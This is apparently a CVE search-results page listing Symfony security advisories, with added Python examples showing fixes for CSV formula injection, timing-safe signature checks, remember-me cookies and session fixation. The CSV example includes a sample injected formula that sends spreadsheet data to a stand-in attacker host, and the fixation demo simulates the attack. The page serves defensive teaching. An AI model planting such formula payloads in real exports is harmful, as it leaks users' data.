
76 matches found

Symfony, added 2023/11/10

CVE-2023-46734: Potential XSS vulnerabilities in CodeExtension filters

Affected versions: Symfony versions >=2.0.0, <4.4.51, >=5.0.0, <5.4.31, and >=6.0.0, <6.3.8 of the Symfony Twig Bridge are affected by this security issue. The issue has been fixed in Symfony 4.4.51, 5.4.31, 6.3.8. All other versions are not maintained anymore. Description: Some filters in the CodeExtension...

CVSS 6.1 | AI score 6 | EPSS 0.00682 | Exploits 0

Symfony, added 2023/11/10

CVE-2023-46735: Potential XSS in WebhookController

Affected versions: Symfony versions >=6.3.0, <6.3.8 of the Symfony Webhook component are affected by this security issue. The issue has been fixed in Symfony 6.3.8. Description: The error message in WebhookController returns unescaped user-submitted input. Resolution: WebhookController now doesn't...

CVSS 6.1 | AI score 6 | EPSS 0.00568 | Exploits 0

Symfony, added 2023/11/10

CVE-2023-46733: Possible session fixation

Affected versions: Symfony versions >=5.4.21, <5.4.31, and >=6.2.7, <6.3.8 of the Symfony Security HTTP component are affected by this security issue. The issue has been fixed in Symfony 5.4.31, 6.3.8. Description: SessionStrategyListener does not always migrate the session after a successful login. I...

CVSS 6.5 | AI score 6.2 | EPSS 0.00689 | Exploits 0

Symfony, added 2023/09/11

CVE-2023-41336: symfony/ux-autocomplete Prevent injection of invalid entity ids for "autocomplete" fields

Affected versions: Versions <2.11.1 of the symfony/ux-autocomplete package are affected by this security issue. Description: Under certain circumstances, an attacker could successfully submit an entity id for an EntityType that is not part of the valid choices. Affected applications are any that...

CVSS 6.5 | AI score 6.2 | EPSS 0.00523 | Exploits 0

Symfony, added 2023/02/01

CVE-2022-24895: CSRF token fixation

Affected versions: Symfony versions >=2.0.0, <4.4.50, >=5.0.0, <5.4.20, >=6.0.0, <6.0.20, >=6.1.0, <6.1.12, and >=6.2.0, <6.2.6 of the Symfony Security Bundle are affected by this security issue. The issue has been fixed in Symfony 4.4.50, 5.4.20, 6.0.20, 6.1.12, and 6.2.6. All other versions are not...

CVSS 8.8 | AI score 7.1 | EPSS 0.0079 | Exploits 0

Symfony, added 2023/02/01

CVE-2022-24894: Prevent storing cookie headers in HttpCache

Affected versions: Symfony versions >=2.0.0, <4.4.50, >=5.0.0, <5.4.20, >=6.0.0, <6.0.20, >=6.1.0, <6.1.12, and >=6.2.0, <6.2.6 of the Symfony Security Bundle are affected by this security issue. The issue has been fixed in Symfony 4.4.50, 5.4.20, 6.0.20, 6.1.12, and 6.2.6. All other versions are not...

CVSS 8.8 | AI score 6.7 | EPSS 0.00753 | Exploits 0

Symfony, added 2022/01/29

CVE-2022-23601: CSRF token missing in forms

Affected versions: Symfony 5.3.14, 5.4.3, and 6.0.3 of the Symfony Framework Bundle are affected by this security issue. The issue has been fixed in Symfony 5.3.15, 5.4.4, and 6.0.4. Description: The Symfony form component provides a CSRF protection mechanism by using a random token injecte...

CVSS 8.8 | AI score 8.2 | EPSS 0.00566 | Exploits 0

Symfony, added 2021/11/24

CVE-2021-41267: Webcache Poisoning via X-Forwarded-Prefix and sub-request

Description: When a Symfony application is running behind a proxy or a load-balancer, you can tell Symfony to look for the X-Forwarded-* HTTP headers. HTTP headers that are not part of the "trusted_headers" allowed list are ignored and protect you from "Cache poisoning" attacks. In Symfony 5.2, we'v...

CVSS 6.5 | AI score 6.1 | EPSS 0.01239 | Exploits 0

Symfony, added 2021/11/24

CVE-2021-41268: Remember me cookie persistence after password changes

Description: Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes their password. Attackers can therefore maintain their access to the account even if the password is changed, as long as they have had the chance to login once and get a...

CVSS 8.8 | AI score 7.2 | EPSS 0.01283 | Exploits 0

Symfony, added 2021/11/24

CVE-2021-41270: Prevent CSV Injection via formulas

Description: CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with = is interpreted by the software as a formula and could be abused by an attacker. In Symfony 4.1, we've added the...

CVSS 6.5 | AI score 6.2 | EPSS 0.01355 | Exploits 0

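The mechanism behind CVE-2021-41270 is easy to reproduce end to end. The block below is an added example written for this page, not Symfony's CsvEncoder code: it renders a constructed export with and without neutralising formula cells, and a small checker parses the result back to show which cells a spreadsheet would still evaluate. The trigger-character set and the tab prefix are the example's own choices (the tab keeps the original value visible while stopping evaluation).

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell as a formula.
# This list is the example's own assumption (the usual CSV-injection set),
# not a copy of Symfony's configuration.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export: the third row carries an attacker-controlled "name".
SAMPLE_ROWS = [
    ["id", "name", "balance"],
    [1, "alice", "10.00"],
    [2, '=HYPERLINK("http://evil.example/?x="&C2,"click me")', "-5.00"],
]


def escape_formula(cell):
    """Prefix a formula-looking cell with a tab so spreadsheets keep it as text.

    The user still sees the original value; only the leading tab is added.
    """
    text = str(cell)
    if text and text[0] in FORMULA_TRIGGERS:
        return "\t" + text
    return text


def to_csv(rows, escape=True):
    """Render rows as CSV text, neutralising formula cells unless escape=False."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_formula(c) if escape else str(c) for c in row])
    return buf.getvalue()


def formula_cells(csv_text):
    """Parse CSV text and return every cell a spreadsheet would evaluate."""
    hits = []
    for row in csv.reader(io.StringIO(csv_text)):
        hits.extend(c for c in row if c and c[0] in ("=", "+", "-", "@"))
    return hits


if __name__ == "__main__":
    print("unescaped:", formula_cells(to_csv(SAMPLE_ROWS, escape=False)))
    print("escaped:  ", formula_cells(to_csv(SAMPLE_ROWS)))
```

Note the side effect visible in the sample: the negative balance "-5.00" is also prefixed, because a leading minus is a formula trigger too. An exporter that needs clean numeric columns should emit numbers as numbers and apply the escaping only to free-text columns.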
Symfony, added 2021/06/17

CVE-2021-32693: Authentication granted to all firewalls instead of just one

Affected versions: Symfony >=5.3.0, <5.3.2 versions of the Symfony Security HTTP component are affected by this security issue. The issue has been fixed in Symfony 5.3.2. Description: When an application defines multiple firewalls, the authenticated token delivered by one of the firewalls is availabl...

CVSS 8.8 | AI score 7.3 | EPSS 0.01388 | Exploits 0

Symfony, added 2021/05/12

CVE-2021-21424: Prevent user enumeration in authentication mechanisms

Affected versions: Symfony >=2.8.0, <3.4.49 | >=5.0.0, <5.2.9 versions of the Symfony Security, Security Guard, Security Core, and Security HTTP components are affected by this security issue. The issue has been fixed in Symfony 3.4.49, 4.4.24, 5.2.9, and 5.3.0 RC1. All other affected minor versions ...

CVSS 5.3 | AI score 5.5 | EPSS 0.01712 | Exploits 0

Symfony, added 2020/09/02

CVE-2020-15094: Prevent RCE when calling untrusted remote with CachingHttpClient

Affected versions: Symfony 4.3, 4.4.0 to 4.4.12, 5.0, and 5.1.0 to 5.1.4 versions of the Symfony HttpClient component are affected by this security issue. The issue has been fixed in Symfony 4.4.13 and 5.1.5. Symfony 4.3 and 5.0 won't be patched as they are not maintained anymore. Description: The...

CVSS 8.8 | AI score 8.3 | EPSS 0.03043 | Exploits 0

Symfony, added 2020/03/30

CVE-2020-5255: Prevent cache poisoning via a Response Content-Type header

Affected versions: Symfony 4.4.0 to 4.4.6 and 5.0.0 to 5.0.6 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 4.4.7 and 5.0.7. Description: When a Response does not contain a Content-Type header, Symfony falls back to the form...

CVSS 4.3 | AI score 4.4 | EPSS 0.01297 | Exploits 0

Symfony, added 2020/03/30

CVE-2020-5275: All "access_control" rules are required when a firewall uses the unanimous strategy

Affected versions: Symfony 4.4.0 to 4.4.6 and 5.0.0 to 5.0.6 versions of the Symfony ErrorHandler component are affected by this security issue. The issue has been fixed in Symfony 4.4.7 and 5.0.7. Description: On Symfony before 4.4.0, when a Firewall checks an access control rule using the unanimo...

CVSS 8.1 | AI score 7.6 | EPSS 0.01148 | Exploits 0

Symfony, added 2020/03/30

CVE-2020-5274: Fix Exception message escaping rendered by ErrorHandler

Affected versions: Symfony 4.4.0 to 4.4.3 and 5.0.0 to 5.0.4 versions of the Symfony ErrorHandler component are affected by this security issue. The issue has been fixed in Symfony 4.4.4 and 5.0.4. Description: When ErrorHandler renders an exception HTML page, it uses un-escaped properties from the...

CVSS 5.5 | AI score 4.8 | EPSS 0.01197 | Exploits 0

Symfony, added 2019/11/13

CVE-2019-18887: Use constant time comparison in UriSigner

Affected versions: Symfony 2.8.0 to 2.8.51, 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony HttpKernel component are affected by this security issue. The issue has been fixed in Symfony 2.8.52, 3.4.35, 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 3.0,...

CVSS 8.1 | AI score 7.8 | EPSS 0.01338 | Exploits 0

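To make the CVE-2019-18887 fix concrete, the following added example (written for this page, not Symfony's UriSigner) implements a small HMAC-based URL signer and verifies the signature two ways: with an instrumented early-exit comparison that reports how many characters it examined, and with `hmac.compare_digest`. The `_hash` parameter name, the canonicalisation rules and the secret are assumptions of the example.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SECRET = b"constructed-demo-secret"  # constructed for the example; load from config in real code
PARAM = "_hash"                      # signature query parameter name (an assumption)


def _canonical(url):
    """The string that gets signed: signature parameter removed, query sorted, fragment dropped."""
    parts = urlsplit(url)
    query = sorted(
        (k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != PARAM
    )
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), ""))


def _expected(url, secret):
    return hmac.new(secret, _canonical(url).encode(), hashlib.sha256).hexdigest()


def _given(url):
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True)).get(PARAM, "")


def sign(url, secret=SECRET):
    """Append an HMAC-SHA256 of the canonical URL as the _hash query parameter."""
    base = _canonical(url)
    sep = "&" if urlsplit(base).query else "?"
    return f"{base}{sep}{urlencode({PARAM: _expected(base, secret)})}"


def naive_equal(a, b):
    """Early-exit comparison, instrumented to return (equal, characters examined).

    This is what the advisory removes: the work done, and so the time taken,
    grows with the length of the correct prefix in the attacker's guess, which
    lets the signature be recovered one character at a time from timings.
    """
    steps = 0
    if len(a) != len(b):
        return False, steps
    for x, y in zip(a, b):
        steps += 1
        if x != y:
            return False, steps
    return True, steps


def check_insecure(url, secret=SECRET):
    """Vulnerable form: ordinary short-circuiting string comparison."""
    equal, _ = naive_equal(_given(url), _expected(url, secret))
    return equal


def check(url, secret=SECRET):
    """Fixed form: compare_digest takes the same time wherever the strings differ."""
    return hmac.compare_digest(_given(url).encode(), _expected(url, secret).encode())


if __name__ == "__main__":
    signed = sign("https://app.example/download?file=report.pdf")
    print(signed)
    print("valid:", check(signed), "tampered:", check(signed.replace("report", "secret")))
    print("steps for wrong guess 'zzzz' vs 'abcd':", naive_equal("abcd", "zzzz")[1])
    print("steps for half-right guess 'abzz':", naive_equal("abcd", "abzz")[1])
```

Both verifiers accept and reject the same URLs; the difference is only observable through timing, which is exactly why the bug survives functional testing and needs a constant-time primitive rather than a clever string compare.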
Symfony, added 2019/11/13

CVE-2019-18889: Forbid serializing AbstractAdapter and TagAwareAdapter instances

Affected versions: Symfony 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony Cache component are affected by this security issue. The issue has been fixed in Symfony 3.4.35, 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 3.1, 3.2, 3.3, 4.0 and 4.1 as they a...

CVSS 9.8 | AI score 9.4 | EPSS 0.33247 | Exploits 0

Symfony, added 2019/11/13

CVE-2019-11325: Fix escaping of strings in VarExporter

Affected versions: Symfony 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony VarExporter component are affected by this security issue. The issue has been fixed in Symfony 4.2.12 and 4.3.8. Description: Some strings were not properly escaped when being dumped by the VarExporter component...

CVSS 9.8 | AI score 9.3 | EPSS 0.03354 | Exploits 0

Symfony, added 2019/11/13

CVE-2019-18888: Prevent argument injection in a MimeTypeGuesser

Affected versions: Symfony 2.8.0 to 2.8.51, 3.4.0 to 3.4.34, 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony HttpFoundation component are affected by this security issue. Symfony 4.3.0 to 4.3.7 versions of the Symfony Mime component are affected by this security issue. The issue has bee...

CVSS 7.5 | AI score 7.7 | EPSS 0.02248 | Exploits 0

Symfony, added 2019/11/13

CVE-2019-18886: Prevent user enumeration using switch user functionality

Affected versions: Symfony 4.2.0 to 4.2.11 and 4.3.0 to 4.3.7 versions of the Symfony Security/Http component are affected by this security issue. The issue has been fixed in Symfony 4.2.12 and 4.3.8. Note that no fixes are provided for Symfony 4.1 as it is not maintained anymore. Description: T...

CVSS 5.3 | AI score 5.3 | EPSS 0.01552 | Exploits 0

Symfony, added 2019/04/17

CVE-2019-10912: Prevent destructors with side-effects from being unserialized

Affected versions: Symfony 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony Cache component are affected by this security issue. The issue has been fixed in Symfony 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are provided for Symfony 3.0, 3.1,...

CVSS 7.1 | AI score 6.8 | EPSS 0.02302 | Exploits 0

Symfony, added 2019/04/17

CVE-2019-10910: Check service IDs are valid

Affected versions: Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony Dependency Injection component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no...

CVSS 9.8 | AI score 9.7 | EPSS 0.05491 | Exploits 1

Symfony, added 2019/04/17

CVE-2019-10913: Reject invalid HTTP method overrides

Affected versions: Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes ar...

CVSS 9.8 | AI score 9.2 | EPSS 0.01854 | Exploits 0

Symfony, added 2019/04/17

CVE-2019-10909: Escape validation messages in the PHP templating engine

Affected versions: Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of Symfony Framework Bundle templating are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are...

CVSS 5.4 | AI score 7.4 | EPSS 0.01048 | Exploits 0

Symfony, added 2019/04/17

CVE-2019-10911: Add a separator in the remember me cookie hash

Affected versions: Symfony 2.7.0 to 2.7.50, 2.8.0 to 2.8.49, 3.4.0 to 3.4.25, 4.1.0 to 4.1.11 and 4.2.0 to 4.2.6 versions of Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.51, 2.8.50, 3.4.26, 4.1.12 and 4.2.7. Note that no fixes are provided...

CVSS 7.5 | AI score 8.4 | EPSS 0.01243 | Exploits 0

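Two of the remember-me advisories on this page, CVE-2021-41268 (cookie still valid after a password change) and CVE-2019-10911 (no separator between the hashed fields), come down to what goes into the cookie's MAC and how it is encoded. The added example below is written for this page and is not Symfony's remember-me code: it binds the cookie to the user's current password hash, so the cookie dies with the old password without any server-side revocation list, and it length-prefixes each field so that two different field lists can never produce the same MAC input. `_mac_unseparated` shows the ambiguity that plain concatenation creates. The cookie layout, the `users` mapping and the secret are assumptions of the example.

```python
import base64
import hashlib
import hmac

SECRET = b"constructed-app-secret"  # constructed for the example only
SEP = ":"


def _mac(fields, secret=SECRET):
    """HMAC over length-prefixed fields, so no two field lists share an encoding."""
    encoded = SEP.join(f"{len(f)}{SEP}{f}" for f in fields)
    return hmac.new(secret, encoded.encode(), hashlib.sha256).hexdigest()


def _mac_unseparated(fields, secret=SECRET):
    """The ambiguous construction: plain concatenation of the fields.

    ["bob1", "234"] and ["bob", "1234"] both become "bob1234", so an attacker who
    can choose a username can line up a MAC input with another user's.
    """
    return hmac.new(secret, "".join(fields).encode(), hashlib.sha256).hexdigest()


def issue(username, password_hash, expires, secret=SECRET):
    """Build a remember-me cookie bound to the user's current password hash."""
    user_b64 = base64.urlsafe_b64encode(username.encode()).decode()
    mac = _mac([username, str(expires), password_hash], secret)
    return f"{user_b64}{SEP}{expires}{SEP}{mac}"


def verify(cookie, users, now, secret=SECRET):
    """Return the username if the cookie is valid, else None.

    `users` maps username -> current password hash (a constructed stand-in for
    the user provider). Because that hash is part of the MAC input, a cookie
    issued before a password change fails here with no extra state to keep.
    """
    try:
        user_b64, expires, mac = cookie.split(SEP, 2)
        username = base64.urlsafe_b64decode(user_b64.encode()).decode()
        expires = int(expires)
    except ValueError:  # malformed cookie (bad base64 and int errors are ValueErrors)
        return None
    if expires < now or username not in users:
        return None
    expected = _mac([username, str(expires), users[username]], secret)
    return username if hmac.compare_digest(mac.encode(), expected.encode()) else None


if __name__ == "__main__":
    users = {"alice": "argon2id$old"}
    cookie = issue("alice", users["alice"], 2_000_000_000)
    print("before password change:", verify(cookie, users, 1_900_000_000))
    users["alice"] = "argon2id$new"
    print("after password change: ", verify(cookie, users, 1_900_000_000))
    print("collision without separator:",
          _mac_unseparated(["bob1", "234"]) == _mac_unseparated(["bob", "1234"]))
```

Binding to the password hash (rather than the password) means the cookie also stops working when the hashing parameters are upgraded, which is usually what you want; if it is not, bind to a dedicated per-user "remember-me version" that is bumped on password change instead.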
Symfony, added 2019/03/12

Twig: Sandbox Information Disclosure

Affected versions: Twig 1.0.0 to 1.37.1 and 2.0.0 to 2.6.2 are affected by this security issue. The issue has been fixed in Twig 1.38.0 and 2.7.0. Description: This vulnerability affects the sandbox mode of Twig. If you are not using the sandbox, your code is not affected. Twig allows the evaluatio...

AI score 6.8 | Exploits 0

Symfony, added 2018/12/06

CVE-2018-19790: Open Redirect Vulnerability when using Security\Http

Affected versions: Symfony 2.7.0 to 2.7.49, 2.8.0 to 2.8.48, 3.0.0 to 3.4.19, 4.0.0 to 4.0.14, 4.1.0 to 4.1.8 and 4.2.0 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.50, 2.8.49, 3.4.20, 4.0.15, 4.1.9 and 4.2.1. Note that no fixe...

CVSS 6.1 | AI score 6.2 | EPSS 0.01485 | Exploits 0

Symfony, added 2018/12/06

CVE-2018-19789: Disclosure of uploaded files full path

Affected versions: Symfony 2.7.0 to 2.7.49, 2.8.0 to 2.8.48, 3.0.0 to 3.4.19, 4.0.0 to 4.0.14, 4.1.0 to 4.1.8 and 4.2.0 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.50, 2.8.49, 3.4.20, 4.0.15, 4.1.9 and 4.2.1. Note that no fixe...

CVSS 5.3 | AI score 6 | EPSS 0.03589 | Exploits 0

Symfony, added 2018/08/01

CVE-2018-14774: Possible host header injection when using HttpCache

Affected versions: Symfony 2.7.0 to 2.7.48, 2.8.0 to 2.8.43, 3.3.0 to 3.3.17, 3.4.0 to 3.4.13, 4.0.0 to 4.0.13, and 4.1.0 to 4.1.2 versions of the Symfony HttpKernel component are affected by this security issue. The issue has been fixed in Symfony 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3...

CVSS 7.2 | AI score 6.3 | EPSS 0.01146 | Exploits 0

Symfony, added 2018/08/01

CVE-2018-14773: Remove support for legacy and risky HTTP headers

Affected versions: Symfony 2.7.0 to 2.7.48, 2.8.0 to 2.8.43, 3.3.0 to 3.3.17, 3.4.0 to 3.4.13, 4.0.0 to 4.0.13 and 4.1.0 to 4.1.2 versions of the Symfony HttpFoundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and...

CVSS 6.5 | AI score 6.8 | EPSS 0.58061 | Exploits 0

Symfony, added 2018/05/25

CVE-2018-11386: Denial of service when using PDOSessionHandler

Affected versions: Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony http-foundation component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also...

CVSS 5.9 | AI score 6.6 | EPSS 0.01607 | Exploits 0

Symfony, added 2018/05/25

CVE-2018-11385: Session Fixation Issue for Guard Authentication

Affected versions: Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10 and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. Note that no fixes are...

CVSS 8.1 | AI score 7.1 | EPSS 0.02014 | Exploits 0

Symfony, added 2018/05/25

CVE-2018-11408: Open redirect vulnerability on security handlers

Affected versions: Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also been fix...

CVSS 6.1 | AI score 6.3 | EPSS 0.01139 | Exploits 0

Symfony, added 2018/05/25

CVE-2018-11407: Unauthorized access on a misconfigured LDAP server when using an empty password

Affected versions: Symfony 2.8.0 to 2.8.36, 3.3.0 to 3.3.16, 3.4.0 to 3.4.6, and 4.0.0 to 4.0.6 versions of the Symfony LDAP component are affected by this security issue. The issue has been fixed in Symfony 2.8.37, 3.3.17, 3.4.7, and 4.0.7. 4.1.0 has also been fixed before its final release. Note...

CVSS 9.8 | AI score 7.8 | EPSS 0.02925 | Exploits 0

Symfony, added 2018/05/25

CVE-2018-11406: CSRF Token Fixation

Affected versions: Symfony 2.7.0 to 2.7.47, 2.8.0 to 2.8.40, 3.3.0 to 3.3.16, 3.4.0 to 3.4.10, and 4.0.0 to 4.0.10 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.48, 2.8.41, 3.3.17, 3.4.11, and 4.0.11. 4.1.0 has also been fix...

CVSS 8.8 | AI score 7.3 | EPSS 0.00761 | Exploits 0

Symfony, added 2017/11/17

CVE-2017-16653: CSRF protection does not use different tokens for HTTP and HTTPS

Affected versions: Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are...

CVSS 5.9 | AI score 5.7 | EPSS 0.01472 | Exploits 0

Symfony, added 2017/11/17

CVE-2017-16652: Open redirect vulnerability on security handlers

Affected versions: Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are...

CVSS 6.1 | AI score 6.2 | EPSS 0.00949 | Exploits 0

Symfony, added 2017/11/17

CVE-2017-16654: Intl bundle readers breaking out of paths

Affected versions: Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Intl component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are provide...

CVSS 7.5 | AI score 6.7 | EPSS 0.02677 | Exploits 0

Symfony, added 2017/11/17

CVE-2017-16790: Ensure that submitted data are uploaded files

Affected versions: Symfony 2.7.0 to 2.7.37, 2.8.0 to 2.8.30, 3.2.0 to 3.2.13, and 3.3.0 to 3.3.12 versions of the Symfony Form component are affected by this security issue. The issue has been fixed in Symfony 2.7.38, 2.8.31, 3.2.14, 3.3.13, 3.4-BETA5, and 4.0-BETA5. Note that no fixes are provide...

CVSS 6.5 | AI score 6.4 | EPSS 0.01553 | Exploits 0

Symfony, added 2017/07/17

CVE-2017-11365: Empty passwords validation issue

Affected versions: Symfony 2.7.30, 2.7.31, 2.8.23, 2.8.24, 3.2.10, 3.2.11, 3.3.3, and 3.3.4 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.7.32, 2.8.25, 3.2.12, and 3.3.5. Description: When fixing issue 23319 with 23341, we...

CVSS 9.8 | AI score 9.3 | EPSS 0.01855 | Exploits 0

Symfony, added 2016/05/09

CVE-2016-4423: Large username storage in session

Affected versions: Symfony 2.3.0 to 2.3.40, 2.7.0 to 2.7.12, 2.8.0 to 2.8.5, and 3.0.0 to 3.0.5 versions of the Security component are affected by this security issue when using the username/password form authentication listener and its simpler version SimpleFormAuthenticationListener. This issue...

CVSS 7.5 | AI score 7.3 | EPSS 0.01862 | Exploits 0

Symfony, added 2016/05/09

CVE-2016-2403: Unauthorized access on a misconfigured LDAP server when using an empty password

Affected versions: Symfony 2.8.0 to 2.8.5 and 3.0.0 to 3.0.5 versions of the Symfony Security component are affected by this security issue. The issue has been fixed in Symfony 2.8.6 and 3.0.6. Description: The bind operation of LDAP, as described in RFC 4513, provides a method which allows for...

CVSS 9.8 | AI score 9.5 | EPSS 0.02925 | Exploits 0

Symfony, added 2016/01/18

CVE-2016-1902: SecureRandom's fallback not secure when OpenSSL fails

Affected versions: Symfony 2.3.0 to 2.3.36, 2.6.0 to 2.6.12, 2.7.0 to 2.7.8 versions of the Security component are affected by this security issue when used with PHP 5.x without the paragonie/random_compat library listed in your Composer dependencies. Projects using PHP 7 are not affected. This iss...

CVSS 7.5 | AI score 7.4 | EPSS 0.01907 | Exploits 0

Symfony, added 2015/11/23

CVE-2015-8125: Potential Remote Timing Attack Vulnerability in Security Remember-Me Service

Affected versions: Symfony 2.3.0 to 2.3.34, 2.6.0 to 2.6.11, 2.7.0 to 2.7.6 versions of the Security component are affected by this security issue. This issue has been fixed in Symfony 2.3.35, 2.6.12, and 2.7.7. Note that no fixes are provided for Symfony 2.4 and 2.5 as they are not maintained...

CVSS 7.5 | AI score 6.1 | EPSS 0.02545 | Exploits 0

Symfony, added 2015/11/23

CVE-2015-8124: Session Fixation in the "Remember Me" Login Feature

Affected versions: Symfony 2.3.0 to 2.3.34, 2.6.0 to 2.6.11, 2.7.0 to 2.7.6 versions of the Security component are affected by this security issue. This issue has been fixed in Symfony 2.3.35, 2.6.12, and 2.7.7. Note that no fixes are provided for Symfony 2.4 and 2.5 as they are not maintained...

CVSS 6.8 | AI score 5.8 | EPSS 0.02712 | Exploits 1

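Session fixation appears three times on this page (CVE-2023-46733 in SessionStrategyListener, CVE-2018-11385 in Guard authentication, CVE-2015-8124 in the remember-me login), and in each case the fix is the same: migrate the session, that is, issue a fresh session id, at the moment authentication succeeds. The added example below is written for this page and is not Symfony code. It plays the attack against a toy in-memory session store with a login routine that either keeps the pre-login id (the bug) or migrates it (the fix); the store, the credential check and the user table are constructed for the example.

```python
import secrets

USERS = {"victim": "correct horse battery staple"}  # constructed credentials


class SessionStore:
    """Minimal in-memory session store keyed by session id."""

    def __init__(self):
        self._sessions = {}

    def start(self):
        """Create an empty session under a fresh random id and return the id."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def migrate(self, sid):
        """Move the session's data under a fresh id and retire the old one."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid


def login(store, sid, username, password, migrate_session):
    """Authenticate; returns the session id the browser must use afterwards.

    migrate_session=False models the vulnerable listener that keeps whatever id
    the request arrived with; True models the fix. Unknown ids get a fresh
    session rather than being adopted, which is the other half of the defence.
    """
    if store.get(sid) is None:
        sid = store.start()
    if USERS.get(username) != password:
        return sid
    if migrate_session:
        sid = store.migrate(sid)
    store.get(sid)["user"] = username
    return sid


def fixation_attack(migrate_session):
    """Play out the attack; True means the attacker's id is now authenticated."""
    store = SessionStore()
    attacker_sid = store.start()  # attacker obtains a valid id from the server...
    # ...plants it in the victim's browser (link, cookie set from a sibling
    # subdomain, etc.), and the victim logs in while carrying that id.
    login(store, attacker_sid, "victim", USERS["victim"], migrate_session)
    session = store.get(attacker_sid)  # attacker now presents the id they planted
    return session is not None and session.get("user") == "victim"


if __name__ == "__main__":
    print("without migration, attacker authenticated:", fixation_attack(False))
    print("with migration, attacker authenticated:   ", fixation_attack(True))
```

Migrating (rather than destroying and recreating) keeps whatever the anonymous session already held, such as a shopping cart or CSRF tokens, while making the planted id worthless; the attacker's copy of the old id no longer maps to anything.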
Symfony, added 2015/05/27

CVE-2015-4050: ESI unauthorized access

Affected versions: 2.3.19 to 2.3.28, 2.4.9 to 2.4.10, 2.5.4 to 2.5.11, 2.6.0 to 2.6.7 versions of the Symfony HttpKernel component are affected by this security issue. This issue has been fixed in Symfony 2.3.29, 2.5.12, and 2.6.8. Note that no fixes are provided for Symfony 2.4 as it's not maintained...

CVSS 4.3 | AI score 5.7 | EPSS 0.08269 | Exploits 0

Symfony, added 2015/04/01

CVE-2015-2308: ESI Code Injection

